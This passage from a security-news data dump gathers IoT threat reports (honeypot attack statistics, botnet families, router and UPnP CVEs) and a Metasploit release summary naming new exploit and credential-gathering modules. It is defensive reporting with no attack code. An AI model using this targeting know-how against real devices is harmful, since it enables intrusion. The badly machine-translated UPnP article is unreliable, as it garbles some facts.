routers](<http://www.s3cur1ty.de/m1adv2013-004>)\n * [Vulnerabilities in D-Link DIR-600 and DIR 300 - HW rev B1 routers](<http://www.s3cur1ty.de/m1adv2013-003>)\n * Vulnerabilities in AVTech devices\n\nAdvantages of this distribution method over password cracking:\n\n * Infection occurs much faster\n * It is much harder to patch a software vulnerability than change a password or disable/block the service\n\nAlthough this method is more difficult to implement, it found favor with many virus writers, and it wasn't long before new Trojans exploiting known vulnerabilities in smart device software started appearing.\n\n## New attacks, old malware\n\nTo see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:\n\n**Service** | **Port** | **% of attacks** | **Attack vector** | **Malware families** \n---|---|---|---|--- \n**Telnet** | 23, 2323 | 82.26% | Bruteforce | Mirai, Gafgyt \n**SSH** | 22 | 11.51% | Bruteforce | Mirai, Gafgyt \n**Samba** | 445 | 2.78% | EternalBlue, EternalRed, CVE-2018-7445 | - \n**tr-069** | 7547 | 0.77% | [RCE in TR-069 implementation](<https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/>) | Mirai, Hajime \n**HTTP** | 80 | 0.76% | Attempts to exploit vulnerabilities in a web server or crack an admin console password | - \n**winbox (RouterOS)** | 8291 | 0.71% | [Used for RouterOS (MikroTik) authentication](<https://xakep.ru/2018/03/29/hajime-hunts-mikrotik/>) and [WinBox-based attacks](<https://threatpost.ru/mikrotik-patched-zero-day-vulnerability-in-record-time/25811/>) | Hajime \n**Mikrotik http** | 8080 | 0.23% | RCE in MikroTik RouterOS < 6.38.5 [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**MSSQL** | 1433 | 0.21% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n**GoAhead httpd** | 81 | 0.16% | [RCE in GoAhead IP cameras](<http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-81-en/>) | Persirai, Gafgyt \n**Mikrotik http** | 8081 | 0.15% | [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**Etherium JSON-RPC** | 8545 | 0.15% | [Authorization bypass (CVE-2017-12113)](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0465>) | - \n**RDP** | 3389 | 0.12% | Bruteforce | - \n**XionMai uc-httpd** | 8000 | 0.09% | [Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices)](<https://www.bleepingcomputer.com/news/security/all-that-port-8000-traffic-this-week-yeah-thats-satori-looking-for-new-bots/>) | Satori \n**MySQL** | 3306 | 0.08% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n \nThe vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven't seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) and the Monero cryptocurrency miner [EternalMiner](<https://securelist.com/sambacry-is-coming/78674/>).\n\nHere's the breakdown of possible infected IoT devices that replies on the IPs that attacked our honeypots in Q2 2018:\n\nDevice | **% of infected devices** \n---|--- \n**MikroTik** | 37.23% \n**TP-Link** | 9.07% \n**SonicWall** | 3.74% \n**AV tech** | 3.17% \n**Vigor** | 3.15% \n**Ubiquiti** | 2.80% \n**D-Link** | 2.49% \n**Cisco** | 1.40% \n**AirTies** | 1.25% \n**Cyberoam** | 1.13% \n**HikVision** | 1.11% \n**ZTE** | 0.88% \n**Unspecified device** | 0.68% \n**Unknown DVR** | 31.91% \n| \n \nAs can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. ~~What's interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) [CVE-2017-7240](<https://nvd.nist.gov/vuln/detail/CVE-2017-7240>) vulnerability in PST10 WebServer, which is used in their firmware.~~1\n\n### Port 7547\n\nAttacks against remote device management ([TR-069](<https://en.wikipedia.org/wiki/TR-069>) specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that's despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.\n\nAnother type of attack exploits the [Chimay-Red vulnerability](<https://wikileaks.org/ciav7p1/cms/page_16384604.html>) in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.\n\n### IP cameras\n\nIP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.\n\nOn June 8, 2018, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/>) was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking [GPON routers](<http://blog.netlab.360.com/gpon-exploit-in-the-wild-ii-satori-botnet-en/>).\n\n## New malware and threats to end users\n\n### DDoS attacks\n\nAs before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.\n\nThis is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often by \"cured\" with a simple reboot.\n\n### Cryptocurrency mining\n\nAnother type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.\n\nA more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:\n\n * At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular: \n * [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) \u2013 RCE in the miniigd SOAP service in Realtek SDK\n * [CVE 2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202017-17215>) \u2013 RCE in the firmware of Huawei HG532 routers\n * [CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>), [CVE-2018-10562](<https://nvd.nist.gov/vuln/detail/CVE-2018-10562>) \u2013 authorization bypass and execution of arbitrary commands on Dasan GPON routers\n * [CVE-2018-10088](<https://nvd.nist.gov/vuln/detail/CVE-2018-10088>) \u2013 buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers\n * Using compromised routers and the [CVE-2018-1000049](<https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/>) vulnerability in the [Claymore](<https://www.dualminer.ru/>) Etherium miner remote management tool, they substitute the wallet address for their own.\n\n### Data theft\n\nThe [VPNFilter](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals' server. Here are the main features of VPNFilter:\n\n * Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject javascript code into intercepted web pages.\n * Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.\n * Uses TOR for communication with C&C.\n * Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.\n\nThe Trojan's distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.\n\nThe very [first VPNFilter report](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:\n\n * ASUS\n * D-Link\n * Huawei\n * Linksys\n * MikroTik\n * Netgear\n * QNAP\n * TP-Link\n * Ubiquiti\n * Upvel\n * ZTE\n\nThe situation is made worse by the fact that these manufacturers' devices are used not only in corporate networks, but often as home routers.\n\n### Conclusion\n\nSmart devices are on the rise, with [some forecasts](<https://www.statista.com/statistics/764026/number-of-iot-devices-in-use-worldwide/>) suggesting that by 2020 their number will exceed the world's population several times over. Yet manufacturers still don't prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).\n\nMalware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.\n\nHere are some simple tips to help minimize the risk of smart device infection:\n\n * Don't give access to the device from an external network unless absolutely necessary\n * Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)\n * Regularly check for new firmware versions and update the device\n * Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters\n * Change the factory passwords at initial setup (even if the device does not prompt you to do so)\n * Close/block unused ports, if there is such an option. For example, if you don't connect to the router via Telnet (port TCP:23), it's a good idea to disable it so as to close off a potential loophole to intruders.\n\n \n\n* * *\n\n1 \u2014 The previous version of the text incorrectly stated that Kaspersky Lab honeypots, used for detecting botnets, were attacked by 33 Miele dishwashers.\n\nA Miele representative shared new details with us so we could review our earlier findings. \n\nWe understand that connection attempts were performed by other objects from the networks that presented the targeted IP-addresses \u2013 including, but not limited to, a router or another device within the network.\n\nWe would like to thank the company for bringing this to our attention and being able to clarify our findings. We apologize for any confusion caused.", "cvss3": {}, "published": "2018-09-18T10:00:36", "type": "securelist", "title": "New trends in the world of IoT threats", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-12113", "CVE-2017-7240", "CVE-2018-1000049", "CVE-2018-10088", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-7445"], "modified": "2018-09-18T10:00:36", "id": "SECURELIST:2F75371B5752C888430A598DF749FD1A", "href": "https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7blog": [{"lastseen": "2021-05-14T14:54:19", "description": "## Two new Active Directory attacks\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/05/metasploit-blg-2-small-1.png)\n\nThis week we added [a pair of new post-exploitation modules](<https://github.com/rapid7/metasploit-framework/pull/11130>) from community contributor [timb-machine](<https://github.com/timb-machine>). Both modules target UNIX machines running SSSD or One Identity's Vintela Authentication Services (VAS) as Active Directory integration solutions. The new [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md>) module can be used on a UNIX target to obtain all cached Active Directory hashes, which can then be cracked using John the Ripper. The second module is [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_kerberos_tickets.md>), which as the name suggests, can similarly be used on a vulnerable target to obtain cached Kerberos tickets.\n\n## Focusing on Micro Focus\n\nThanks to [pedrib](<https://github.com/pedrib>) for two new pull requests related to Micro Focus Operations Bridge Manager and Bridge Reporter. Pedrib contributed a new [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection ](<https://github.com/rapid7/metasploit-framework/pull/15090>) module, which exploits an unauthenticated command injection vulnerability on Linux, versions 10.40 and below ([CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>)). Pedrib also [updated](<https://github.com/rapid7/metasploit-framework/pull/15087>) the existing [Micro Focus Operations Bridge Manager Local Privilege Escalation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md>) module to also support Operations Bridge Reporter.\n\n## PR #15000!\n\nCongratulations to [pingport80](<https://github.com/pingport80>), who snagged [PR #15,000](<https://github.com/rapid7/metasploit-framework/pull/15000>)! This enhancement replaces existing usages of `which` in `Msf::Sessions::CommandShell.binary_exists` with `command -v` \u2014 a more portable solution that works consistently across different shells.\n\n## New Module Content (6)\n\n * [GravCMS Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15030>) by Mehmet Ince, which exploits [CVE-2021-21425](<https://attackerkb.com/topics/DXBeSBbvfn/cve-2021-21425?referrer=blog>) \\- This adds a new remote exploit module that leverages unauthenticated arbitrary YAML write/update vulnerability to get remote code execution under the context of the web server user. This vulnerability has been fixed in the admin component version 1.10.10, which was released with GravCMS version 1.7.9.\n * [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15090>) by Pedro Ribeiro, which exploits [CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>). This is an unauthenticated OS command injection vulnerability in the Micro Focus Operations Bridge Reporter.\n * [IGEL OS Secure VNC/Terminal Command Injection RCE](<https://github.com/rapid7/metasploit-framework/pull/14947>) by James Brytan, James Smith, Marisa Mack, Rob Vinson, Sergey Pashevkin, and Steven Laura - This adds a new module that exploits an unauthenticated command injection vulnerability in the Secure Terminal and Secure Shadow services in various versions of IGEL OS.\n * [Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE](<https://github.com/rapid7/metasploit-framework/pull/15105>) by Bruno Keith (bkth_), Grant Willcox (tekwizz123), Niklas Baumstark (_niklasb), and Rajvardhan Agarwal (r4j0x00), which exploits [CVE-2021-21220](<https://attackerkb.com/topics/guR2zJ2y2K/cve-2021-21220?referrer=blog>) \\- This adds an exploit module for a Chrome V8 XOR typer OOB Access RCE that was found in the 2021 Pwn2Own competition by Dataflow Security's Niklas Baumstark (@niklasb) and Bruno Keith (@bkth). \nNote that this module will require you to run Chrome without the sandbox enabled as it does not come with a sandbox escape.\n * [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Active Directory credentials from two different solutions on UNIX (SSSD and VAS).\n * [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Kerberos tickets from two different solutions on UNIX (SSSD and VAS).\n\n## Enhancements and features\n\n * [#14831](<https://github.com/rapid7/metasploit-framework/pull/14831>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Updates the HttpClient mixin with a new cookie jar implementation which correctly updates and merges the `Set-Cookie` header responses when using the `send_request_cgi` `keep_cookies` option\n * [#15000](<https://github.com/rapid7/metasploit-framework/pull/15000>) from [pingport80](<https://github.com/pingport80>) \\- Replaces the use of the `which` command with `command -v` giving us a more portable solution\n * [#15087](<https://github.com/rapid7/metasploit-framework/pull/15087>) from [pedrib](<https://github.com/pedrib>) \\- The `exploit/windows/local/microfocus_operations_privesc` module now supports both vulnerable Operations Bridge Manager installations and vulnerable Operations Bridge Reporter installations, with the new additional target being Operations Bridge Reporter.\n * [#15096](<https://github.com/rapid7/metasploit-framework/pull/15096>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session support to the `post/windows/gather/checkvm` module. This also notably adds cross-platform support for getting a list of running processes using shell and Meterpreter sessions.\n * [#15136](<https://github.com/rapid7/metasploit-framework/pull/15136>) from [pedrib](<https://github.com/pedrib>) \\- Update the `exploit/multi/http/microfocus_ucmdb_unauth_deser` module default Linux payload from `cmd/unix/generic` to `cmd/unix/reverse_python`.\n * [#15138](<https://github.com/rapid7/metasploit-framework/pull/15138>) from [h00die](<https://github.com/h00die>) \\- This enhances the `auxiliary/scanner/http/dell_idrac` module by cleaning up the code, adding the `last_attempted_at` field to `create_credential_login` to prevent a crash, and adding documentation for the module.\n\n## Bugs Fixed\n\n * [#15111](<https://github.com/rapid7/metasploit-framework/pull/15111>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue in how some Meterpreter session types would inconsistently run commands issued through `sessions -c`.\n * [#15116](<https://github.com/rapid7/metasploit-framework/pull/15116>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes a bug that would occur when importing newer Acunetix reports into the database due to a change in how the timestamp is formatted.\n * [#15120](<https://github.com/rapid7/metasploit-framework/pull/15120>) from [pedrib](<https://github.com/pedrib>) \\- Fixes a regression within `tools/modules/module_author.rb ` so that it runs without crashing\n * [#15140](<https://github.com/rapid7/metasploit-framework/pull/15140>) from [wvu-r7](<https://github.com/wvu-r7>) \\- `msftidy_docs.rb` now doesn't double warn on optional (and missing) `Options` headers.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-29T10%3A54%3A48-05%3A00..2021-05-05T09%3A27%3A49-04%3A00%22>)\n * [Full diff 6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/compare/6.0.42...6.0.43>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-07T19:41:01", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21220", "CVE-2021-21425", "CVE-2021-22502"], "modified": "2021-05-07T19:41:01", "id": "RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D", "href": "https://blog.rapid7.com/2021/05/07/metasploit-wrap-up-110/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-03-28T22:38:03", "description": "Earlier this year, Chromecast streaming dongle, Google Home devices and smart TV users are forced to harvest a strip from the youtube PewDiePie channel promotion information. This hijacking is said by the tube top traffic UP the main are a fan of the battle for the thrown. Reported that hackers exploit the improperly configured router, these routers enable the universal plug and play(Universal Plug \u2013 and \u2013 Play, abbreviated UPnP)service, resulting in the router the public port to the private device and the public Internet open. \nMany devices such as cameras, printers and routers, use the UPnP Protocol, so that it can automatically find and check local other devices on the network, and can communicate with each other to share data or stream media. But it brings convenience, but also brings security risks, such as from attacker-controlled devices to bypass the firewall protection, etc., to name a few. \nIn the above event, we investigated a home network with UPnP-related events, found that many users of the device still using the UPnP Protocol. \n\n! [](/Article/UploadPic/2019-3/20193292294895.jpg) \nTable 1. Enabled UPnP for major equipment types \nThis year 1 month, we detected 76 per cent of the router to enable the UPnP Protocol, and 27% of media equipment such as DVD player and media streaming device is also enabled UPnP. Once the UPnP vulnerability be exploited by attackers, a router or other device easily becomes the agent, and then become confused botnets, distributed denial of service attacks([DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>))or spam campaigns the source, and let people almost can't track malicious activity implementation. Previously there have been such cases, the use of a router UPnP Protocol vulnerabilities so that it is forced to connect to Port, send spam or other malicious messages. \nIoT botnet Satori was due to the use of the UPnP vulnerabilities and the infamous. The vulnerability, CVE-2014-8361 is a Realtek SDK miniigd UPnP SOAP interface command injection vulnerability. 2015 5 months, and this vulnerability is related to the announcement and provided the appropriate mitigation measures, but according to our collection of the latest data, many devices are still using older, possibly vulnerable UPnP version. \n\n! [](/Article/UploadPic/2019-3/20193292295992. png) \nFigure 1. Shodan for UPnP detection of the relevant results of the 2019 \u5e74 3 \u6708 5 data \nOnline search engine Shodan can be presented worldwide using the UPnP Protocol, the device number and distribution. In the scan UPnP uses the standard port 1900, we retrieved the 1,649,719. The following table lists some of the well-known UPnP libraries, MiniUPnPd and Custom\uff08Broadcom UPnP library is the most search equipment used. \n! [](/Article/UploadPic/2019-3/20193292297936.jpg) \nTable 2. Shodan display the results in the first three UPnP library 2019 3 month 5 day data \nUPnP related vulnerabilities and the home network device status \nThrough our own Scan tool, we studied the family and other small-scale network environment using UPnP library, and to determine the possible cause the device to the vulnerable factors. In short, we found that most devices still use the older version of the UPnP library, and these UPnP library in the presence of many vulnerabilities have been published for many years. \nMiniUPnPd \nOur IOT scan tool data display, enable UPnP devices 16% use a MiniUPnPd library. MiniUPnPd is a well-known UPnP daemon for NAT\uff08Network Address Translation a router providing port mapping Protocol services. Interestingly, we detected installed older versions of MiniUPnPd device, with 24%in the use MiniUPnPd 1.0, 30% in the use MiniUPnPd 1.6, only 5%of the equipment used MiniUPnPd 2. x version(miniupnpd 2.1 is the latest version). \n! [](/Article/UploadPic/2019-3/20193292298107.jpg) \nTable 3. MiniUPnPd each version using the ratio of \nHaving the older version of Daemon equipment must be updated, in order to put an end to some of the known high-risk vulnerabilities. For example, CVE-2013-0230 is the MiniUPnPd version 1.0 of the ExecuteSoapAction in a stack-based buffer overflow vulnerability that allows an attacker to execute arbitrary code; CVE-2013-0229 is MiniUPnPd 1.4 before a ProcessSSDPRequest a function of the vulnerability, which allows an attacker through a request to trigger a buffer over-read to cause a denial of Service(DoS); the CVE-2017-1000494 is MiniUPnPd version 2.0 prior to an uninitialized stack variable vulnerability, which allows attackers to initiate a DoS attack(segmentation fault and memory damage). \nWindows UPnP server \nWe also found that 18% of the devices using a Windows-based UPnP. These devices, especially the Microsoft Windows XP computer, Windows NT 5.1, you should check whether you have applied MS07-019 patch. (But Windows XP in 2014 4 months have come to an end, which means that it is no longer under Microsoft support, security issues will also be resolved.) Windows XP comes with UPnP functionality is available out of the box, and the patch can solve the UPnP memory corruption vulnerability CVE-2007-1204, and this vulnerability allows a remote attacker on the local service account context to run arbitrary code. \nLibupnp is used in UPnP device of the portable SDK \nFor the UPnP Device SDK portable software development kit libupnp is another well-known UPnP library, it can support a variety of[OS](<http://www.myhack58.com/Article/48/Article_048_1.htm>a). According to our data, the detection device there is a 5% in the use of the libupnp library package, although not a large proportion, but we note that having the library's equipment is mostly 1. 6. 18 / 1.6.19 version before the current version is 1. 8. 4 in. And in 1. 6. 18 a previous version, unique_service_name function in the presence of a stack-based buffer overflow vulnerability, CVE-2012-5958, which allows remote attack via the User Datagram Protocol\uff08UDP data packet to execute arbitrary code. \nConclusions \nFor the user, to determine whether the device has the UPnP related vulnerabilities or whether they are infection is very tricky. Some devices may be hidden in the behind a NAT, so that even if the vulnerability exists, the user will not immediately see the risk. In order to prevent the use of UPnP related vulnerabilities, users should ensure that their device updates. If you suspect the device is infected, you should restart the device, reset it to original factory settings, or to prudence, which was all replaced. Unless network need the device enabled UPnP function, otherwise the best in the device allows the case of the disabled. However, it is noted that, turn off UPnP might also be associated disable some of the features, including the local device dependency, or the need to ignore a request from the device to. \nHome users can also follow these measures to increase security: \n1, use the trend of the home network HouseCal tool scans the home network, and check which devices UPnP port 1900 is open. \n2, go to the device setup page for example the router's settings page to disable UPnP. \n3, according to the need to manually configure port forwarding settings. \n\n", "edition": 2, "cvss3": {}, "published": "2019-03-29T00:00:00", "title": "Next from the printer coming out will be?-- The theory of the UPnP using the status quo and risk-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0229", "CVE-2013-0230", "CVE-2007-1204", "CVE-2017-1000494", "CVE-2012-5958", "CVE-2014-8361"], "modified": "2019-03-29T00:00:00", "id": "MYHACK58:62201993392", "href": "http://www.myhack58.com/Article/html/3/62/2019/93392.htm", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2022-05-09T12:39:15", "description": "[![](https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg)](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[![](https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg)](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\nBesides CVE-2021\u201320090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * [CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T09:27:00", "type": "thn", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 